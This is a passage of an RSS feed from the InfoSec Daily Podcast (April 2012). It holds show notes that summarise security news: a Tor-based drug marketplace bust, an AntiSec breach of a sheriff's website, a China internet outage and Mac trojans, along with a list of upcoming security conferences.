<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Boeing also refused to give details on what the device will be named. Additionally, they also refused to name who they were partnering with on this project. This makes sense, however, since it is supposed to be a high security device. Boeing does not want information to get out about who they are talking to for this project so that there can&#39;t be any pre-emptive breaches of security for their hardware/software.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://arstechnica.com/tech-policy/news/2012/04/feds-shutter-online-narcotics-store-that-used-tor-to-hide-its-tracks.ars"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2012/04/feds-shutter-online-narcotics-store-that-used-tor-to-hide-its-tracks.ars</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Federal authorities have arrested eight men accused of distributing more than $1 million worth of LSD, ecstasy, and other narcotics with an online storefront that used the TOR anonymity service to mask their Internet addresses.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Farmer&#39;s Market,&quot; as the online store was called, was like an Amazon for consumers of controlled substances, according to a 66-page indictment unsealed on Monday. It offered online forums, Web-based order forms, customer service, and at least four methods of payment, including PayPal and Western Union. From January 2007 to October 2009, it processed some 5,256 orders valued at $1.04 million. The site catered to about 3,000 customers in 35 countries, including the United States.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To elude law enforcement officers, the operators used software provided by the TOR Project that makes it virtually impossible to track the activities of users&#39; IP addresses. The alleged conspirators also used IP anonymizers and covert currency transactions to cover their tracks. The indictment, which cited e-mails sent among the men dating back to 2006, didn&#39;t say how investigators managed to infiltrate the site or link it to the individuals accused of running it.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prosecutors said in a press release that the charges were the result of a two-year investigation led by agents of the Drug Enforcement Administration&#39;s Los Angeles field division. &quot;Operation Adam Bomb, &quot; as the investigation was dubbed, also involved law enforcement agents from several US states and several countries, including Colombia, the Netherlands, and Scotland.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.securityweek.com/antisec-targets-michigan-law-enforcement-agency"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securityweek.com/antisec-targets-michigan-law-enforcement-agency</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AntiSec supporters, branding themselves the LulzKnights, targeted the Berrien County Sheriff&#39;s Department on Sunday. The St. Joseph, MI, law enforcement agency lost their internal emails and documents due to the incident, and they were published online. However, this breach could lead to more damage due to the number of hosted accounts that shared space with AntiSec&rsquo;s victim.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Little was said about the reasoning for the attack against the Berrien County Sheriff&#39;s Department, other than the fact that it was related to one of AntiSec&rsquo;s oldest traditions &ndash; Shooting Sheriff Saturday. This time however, Saturday was pushed forward a day, but the results were the same.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The law enforcement agency&rsquo;s domain was</span><a href="http://www.webcitation.org/66xASkrUZ"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">compromised</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, but the exact method used by AntiSec is unknown. However, their announcement of the attack included proof that they had full control over the webserver. Other issues pointed out by AntiSec include weak authentication, such as using the password &lsquo;s3cur1fy&rsquo; to access the administrator account on the CMS.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition to defacing the domain, the attackers claimed to have walked away with the database used to drive the website itself, as well as email spools from at least two accounts. Based on the leaked documents, it would appear that the website&rsquo;s content was hosted in the compromised database.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Several of the leaked CSV files reviewed by </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">SecurityWeek</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> were examples of what is typically known as a database dump. These mass purges of data contained the same information found on cached copies of the sheriff&rsquo;s domain, including the HTML needed in order to render a given page.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The leaked email messages themselves were mundane for the most part, consisting of mostly spam. However, there were a few personal messages within the batch shown to us, including pictures of fishermen playing with a baby deer, as well as a chain letter involving cute puppy images.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other messages were business related, including a San Diego Intelligence Group memo (FOUO / LE Sensitive) on the use of the Xexun (TK102) GPS Tracker by drug traffickers; and a Grand Jury indictment for a meth dealer. Further, an email subscribers list with 321 email addresses was also among the leaked data, including names and zip codes.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The boot directory and shadow file were reported to have been deleted once the compromised data had been taken from the server. At the time this story was written, the sheriff department&rsquo;s website was resolving, but all of the content was gone, leaving only a blank page in its place.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-646-great-failwall-of-china-more-mac-malware-microsoft-iphone-boeing-android-farmers-market-and-lulzknights/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3774/0/infosec-daily-podcast-episode-646.mp3" length="62424798" type="audio/mpeg" />
		<itunes:duration>0:43:20</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 646 for April 16, 2012. Tonight&#39;s podcast is hosted by Dave Kennedy, Rick Hayes, Beau Woods, and Karthik Rangarajan. &#160;
&#160;
Special Co-Host Varun Sharma.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 646 for April 16, 2012. Tonight&#39;s podcast is hosted by Dave Kennedy, Rick Hayes, Beau Woods, and Karthik Rangarajan. &#160;
&#160;
Special Co-Host Varun Sharma.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: http://arstechnica.com/tech-policy/news/2012/04/great-firewall-hiccup-china-loses-internet-connectivity-for-an-hour.ars
Thursday Internet traffic dropped off substantially to and from China. Paul Mozur of the Wall Street Journal&#39;s China Real Time blog tracked the outage as a data dropoff lasting from 11:00am to 1:00pm local time.
The interruption spawned a host of possible explanations. These included the powerful 8.6 magnitude earthquake the day before off the coast of Indonesia, a cinching down of the &#34;Great Firewall of China&#34; censorship system, a failure in the country&#39;s network backbone, and a software upgrade.
There is a bottleneck of undersea cables in the Malacca Straits which could have been affected by the quake. China is connected to the Internet from only three major points, as the Guardian notes in its coverage. This makes the country arguably more vulnerable than countries like the US.
However, Xu Chuanchao, an executive with Sohu, one of China&#39;s largest Web portals, posted to his microblog his opinion that &#34;This malfunction is caused by the failure of China&#39;s backbone network and is under renovation.&#34;
The publication also pointed out that many &#34;lesser known VPNs seemed to connect without any problems.&#34; and quoted David Wolf of Wolf Group Asia as saying, &#34;It&#39;s possible they were short of capacity and that&#39;s why some people got through, but given that obscure VPNs were working I find that hard to believe.&#34;
&#8230;
Source: http://www.cio.com/article/704343/Two_More_Mac_Trojans_Discovered_but_Don_t_Panic
Following the outbreak of the Flashback Mac Trojan, security researchers have spotted two more cases of Mac OS X malware. The good news is most users have little reason to worry about them.
Both cases are variants on the same Trojan, called SabPub, Kaspersky Lab Expert Costin Raiu wrote on Securelist.
The first variant is known as Backdoor.OSX.SabPub.a[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 645 &#8211; Google BBS, Cell Phone Pron?, OpDefense, Zeus Targeting Cloud, Industry Vs. Academia, Are you Shitting?, and TeaMp0isoN Arrest?</title>
		<link>http://www.isdpodcast.com/episode-645-google-bbs-cell-phone-pron-opdefense-zeus-targeting-cloud-industry-vs-academia-are-you-shitting-and-teamp0ison-arrest</link>
		<comments>http://www.isdpodcast.com/episode-645-google-bbs-cell-phone-pron-opdefense-zeus-targeting-cloud-industry-vs-academia-are-you-shitting-and-teamp0ison-arrest#comments</comments>
		<pubDate>Sat, 14 Apr 2012 00:53:22 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3767</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 645 for April 13, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 645 for April 13, 2012. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.masswerk.at/googleBBS/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.masswerk.at/googleBBS/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is more a funny site than a story. This site shows us all how Google would have been in the 80s, the BBS days, before Karthik was born.</span></p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="624" /></colgroup>
<tbody>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Welcome back, ANONYMOUS. Today it is Friday 13 April 2012! &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;‖ </span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
